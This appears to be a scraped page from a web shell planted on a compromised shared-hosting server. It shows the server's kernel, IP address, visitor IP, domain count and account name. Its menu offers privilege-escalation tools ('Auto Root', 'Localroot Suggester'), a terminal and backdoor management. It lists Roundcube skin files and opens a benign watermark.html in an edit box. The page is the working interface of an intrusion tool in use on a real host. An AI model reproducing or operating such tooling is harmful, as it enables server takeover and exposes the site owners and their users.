Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
webuzo-data /
roundcube /
skins /
elastic /
Delete
Unzip
Name
Size
Permission
Date
Action
deps
[ DIR ]
drwxr-xr-x
2026-02-08 09:33
fonts
[ DIR ]
drwxr-xr-x
2026-02-08 09:33
images
[ DIR ]
drwxr-xr-x
2026-02-08 09:33
styles
[ DIR ]
drwxr-xr-x
2026-02-08 09:33
templates
[ DIR ]
drwxr-xr-x
2026-02-08 09:33
README.md
4.85
KB
-rw-r--r--
2026-02-08 09:33
meta.json
674
B
-rw-r--r--
2026-02-08 09:33
thumbnail.png
1.81
KB
-rw-r--r--
2026-02-08 09:33
ui.js
155.57
KB
-rw-r--r--
2026-02-08 09:33
ui.min.js
59.88
KB
-rw-r--r--
2026-02-08 09:33
watermark.html
853
B
-rw-r--r--
2026-02-08 09:33
Save
Rename
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title></title> <style type="text/css"> html, body { height: 100%; overflow: hidden; } body { background: url(images/logo.svg) center no-repeat #fff; background-size: 30%; background-blend-mode: luminosity; } html:not(.dark-mode) body:before { content: ""; position: absolute; top: 0; bottom: 0; left: 0; right: 0; background: rgba(255, 255, 255, .85); } html.dark-mode > body { background-color: #21292c; background-blend-mode: soft-light; } </style> <script> try { if (document.cookie.indexOf('colorMode=dark') > -1 || (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches) ) { document.documentElement.className += ' dark-mode'; } } catch (e) { } </script> </head> <body></body> </html>